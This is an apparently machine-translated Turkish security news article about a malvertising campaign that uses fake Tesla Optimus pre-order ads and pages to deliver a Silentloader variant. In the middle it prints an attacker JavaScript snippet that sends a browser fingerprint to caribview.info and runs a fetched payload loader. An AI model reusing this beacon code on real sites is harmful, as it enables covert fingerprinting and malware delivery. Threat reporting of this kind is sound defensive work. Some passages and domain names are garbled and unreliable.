Son haftalarda, Tesla’nın beklenen Optimus robotları için ön siparişleri ümit eden sponsorlu listelerin bir telaşı Google arama sonuçlarının en üstünde görünmeye başladı.
Bu reklamlar, şüphesiz kullanıcıları Tesla’nın tasarımını taklit eden mikrositleri taklit etmeye yönlendirerek, robotik platformuna erken erişim için 250 $ “iade edilemez” mevduat kabul ettiğini iddia etti.
İlk bakışta rutin bir kimlik avı dolandırıcılığı gibi görünen şey çok daha sinsi bir operasyona dönüştü: hackerlar, özel kötü amaçlı yazılım yüklerini dağıtmak için bu sahte Tesla açılış sayfalarını silahlandırdı.
İnternet Storm Center analistleri, kampanyanın Tesla’nın Optimus’a halkın çıkarını hüküm süren kendi tanıtım materyallerini takiben Ağustos ayı başında ortaya çıktığını belirtti.
.webp)
Tehdit –com ve explusive-deSla.com gibi alan adlarını kaydederek, tehdit aktörleri, maksimum görünürlük sağlamak için Google’ın reklam platformuna dayanarak geleneksel e-posta filtrelerini ve sosyal medya izlemeyi önledi.
Bu ücretli reklamları tıklayan mağdurlar, görünüşte meşru bir ön sipariş formuyla karşılaştılar, sahnelerin arkasında kötü niyetli senaryoların sessizce enjekte edildiğinden habersiz.
Form gönderildikten sonra, sağlanan test kredi kartını şarj etmek yerine, site ziyaretçinin tarayıcısını parmak izlemek ve ikinci aşamalı bir yükleyici indirmek için tasarlanmış JavaScript ile yanıt verdi.
İnternet Storm Center araştırmacıları, bu yükleyiciyi, aktör kontrollü alan Caribview.info’dan ek modüller getirecek şekilde yapılandırılmış yaygın olarak gözlemlenen “Silentloader” ailesinin bir varyantı olarak tanımladılar.
Ağ trafiğinin analizi, yükleyicinin daha sonra şifresini çözen ve yürüttüğü – diskte yürütülebilir bir şekilde kaldırmayan şifreli yapılandırma blobları sağlayan HTTP post isteklerini ortaya çıkardı.
Enfeksiyon mekanizması derin dalış
Enfeksiyon mekanizması, tespitten kaçınmak için dinamik komut dosyası enjeksiyonuna ve bellek içi yürütmeye bağlıdır. Kurbanın tarayıcısı sahte Tesla sayfasını oluşturduğunda, aşağıdaki snippet, ödeme sayfasına dinamik olarak eklenir:-
(function(){
var xhr = new XMLHttpRequest();
xhr.open('POST', 'https://caribview.info/tesla/api/config', true);
xhr.onload = function(){
var cipher = new Uint8Array(xhr.response);
var config = decryptConfig(cipher, key);
executePayload(config.loaderUrl);
};
xhr.responseType="arraybuffer";
xhr.send(collectBrowserFingerprint());
})();Bu kod, yüklü yazı tipleri, ekran çözünürlüğü ve eklenti sürümleri gibi sistem ayrıntılarını toplamak için tarayıcının yerel özelliklerinden yararlanır.
.webp)
Şifrelenmiş yanıt, hem ikincil yükün URL’sini hem de bir kripto anahtarını içerir, bu da imza tabanlı savunmaların indirmenin gerçek doğasına kör kalmasını sağlar.
Belleğe girdikten sonra, yükleyici kurbanın tarayıcı işlemine yansıtıcı bir DLL enjeksiyonu başlatır ve diske yazmadan tam kod yürütme ayrıcalıkları verir.
SOC’nizi en son tehdit verilerine tam erişimle donatın Herhangi biri. Olay yanıtı iyileştirebilir -> 14 günlük ücretsiz deneme alın